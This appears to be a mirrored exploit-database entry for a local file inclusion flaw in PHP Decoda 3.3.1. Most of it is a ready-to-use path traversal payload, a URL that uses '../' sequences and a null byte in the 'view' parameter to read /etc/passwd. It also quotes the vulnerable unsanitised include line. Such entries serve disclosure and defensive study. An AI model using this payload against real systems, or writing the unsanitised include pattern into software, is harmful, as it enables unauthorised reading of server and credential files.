[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP Decoda 3.3.1 - Local File Inclusion

Author: Number 7
type: webapps
platform: php
port: 
date_added: 2012-06-16 
date_updated: 2012-06-18 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt19500/screen-shot-2012-06-18-at-22308-pm.png 
application_url: http://www.exploit-db.commilesj-php-decoda-3.3.1-0-g508c6ee.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [php-decoda local file inclusion ]
# Date: [16/06/2012]
# Author: [Number 7]
# Software Link: [http://milesj.me/code/php/decoda]
# Version: [3.3.1]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp:
http://localhost/milesj-php-decoda/index.php?view=../../../../../../../etc/passwd%00

~~Line 111 in Index.php:
	<?php	include $view .'.php'; ?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blogpot:   [http://TunisianSeven.blogspot.com/]
Twitter:   [@TunisianSeven]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.